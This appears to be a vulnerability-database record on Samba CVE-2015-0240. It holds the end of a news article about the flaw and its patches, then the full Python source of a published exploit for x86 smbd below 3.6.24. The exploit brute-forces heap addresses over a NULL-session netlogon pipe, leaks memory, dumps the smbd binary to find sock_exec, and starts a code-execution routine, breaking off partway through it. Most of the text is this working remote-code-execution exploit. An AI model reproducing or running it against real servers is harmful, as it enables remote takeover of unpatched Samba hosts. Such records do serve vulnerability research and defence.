\n\n\nRed Hat product team published a detailed analysis of this vulnerability on its [blog post](<https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/>). According to the researchers, Red Hat Enterprise Linux versions 5 through 7 are affected, as are Red Hat Storage Server versions 2.1 and 3. Except RHEL7, the vulnerability is marked critical for all of the affected products. Other Linux distributions have also posted security alerts about the vulnerability.\n\n \n\n\nA large number of users might potentially be at risk because Samba ships with a wide range of Linux distributions. However, users affected by the critical vulnerability also depends on which operating system they run on their machines.\n\n \n\n\nThe Samba development team has fixed the flaw in the new Samba version, Samba 4.1.17, which is available to download. The credit for discovering and reporting the flaw in Samba goes to the Microsoft Vulnerability Researcher, Richard van Eeden, who also provided the patch.\n\n \n\n\nMeanwhile, other major Linux distributions, including [Ubuntu](<https://www.ubuntu.com/usn/usn-2508-1/>), [Debian](<https://www.debian.org/security/2015/dsa-3171>) and [Suse](<https://bugzilla.suse.com/show_bug.cgi?id=917376>), have also released updated packages in their repositories, with others to follow soon.\n", "modified": "2015-02-24T11:10:53", "published": "2015-02-24T00:10:00", "id": "THN:EC707FA03C4266A554099062CA89FF0E", "href": "https://thehackernews.com/2015/02/samba-service-hit-by-remote-code.html", "type": "thn", "title": "Samba Service Hit By Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-13T16:16:03", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2015-04-15T00:00:00", "published": "2015-04-15T00:00:00", "id": "1337DAY-ID-23513", "href": "https://0day.today/exploit/description/23513", "type": "zdt", "title": "Samba < 3.6.2 x86 - PoC", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nExploit for Samba vulnerabilty (CVE-2015-0240) by sleepya\r\n \r\nThe exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by\r\nReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'\r\nin libtalloc does not write a value on 'creds' address.\r\n \r\nReference:\r\n- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/\r\n \r\nNote:\r\n- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)\r\n if something failed\r\n \r\nFind heap address:\r\n- ubuntu PIE heap start range: b7700000 - b9800000\r\n- start payload size: the bigger it is the lesser connection and binding time.\r\n but need more time to shrink payload size\r\n- payload is too big to fit in freed small hole. so payload is always at end\r\n of heap\r\n- start bruteforcing heap address from high memory address to low memory address\r\n to prevent 'creds' pointed to real heap chunk (also no crash but not our payload)\r\n \r\nLeak info:\r\n- heap layout is predictable because talloc_stackframe_pool(8192) is called after\r\n accepted connection and fork but before calling smbd_server_connection_loop_once()\r\n- before talloc_stackframe_pool(8192) is called, there are many holes in heap\r\n but their size are <8K. so pool is at the end of heap at this time\r\n- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool.\r\n with the same pattern of request, the layout in pool are always the same.\r\n- many data are not allocated in pool but fit in free holes. so no small size data are\r\n allocated after pool.\r\n- normally there are only few data block allocated after pool.\r\n - pool size: 0x2048 (included glibc heap header 4 bytes)\r\n - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes)\r\n - p->in_data.pdu.data. the size is 0x10e8 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - all fragment should be same size to prevent talloc_realloc() changed pdu.data size\r\n - so last fragment should be padded\r\n - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - p->in_data.data.data. the size is our netlogon data\r\n - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes)\r\n - this data is allocated by realloc(), grew by each fragment. so this memory\r\n block is not allocated by mmapped even the size is very big.\r\n- pool layout for interested data\r\n - r->out offset from pool (talloc header) is 0x13c0\r\n - r->out.return_authenticator offset from pool is 0x13c0+0x18\r\n - overwrite this (with link unlink) to leak info in ServerPasswordSet response\r\n - smb_request offset from pool (talloc header) is 0x11a0\r\n - smb_request.sconn offset from pool is 0x11a0+0x3c\r\n - socket fd is at smb_request.sconn address (first struct member)\r\n- more shared folder in configuration, more freed heap holes\r\n - only if there is no or one shared, many data might be unexpected allocated after pool.\r\n have to get that extra offset or bruteforce it\r\n \r\n \r\nMore exploitation detail in code (comment) ;)\r\n\"\"\"\r\n \r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n \r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n \r\n \r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n \r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n \r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n \r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n \r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n \r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n \r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n \r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n \r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n \r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n \r\n \r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n \r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n \r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n \r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n \r\n########\r\n# request helper functions\r\n########\r\n \r\n# only one global requester\r\nrequester = Requester()\r\n \r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n \r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n \r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n \r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n \r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n \r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n \r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n \r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n \r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n \r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n \r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n \r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n \r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n \r\n \r\n########\r\n# leak info\r\n########\r\n \r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n \r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n \r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n \r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n \r\n return answers[0]\r\n \r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address ...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n \r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n \r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n \r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n \r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n \r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n \r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n \r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n \r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... 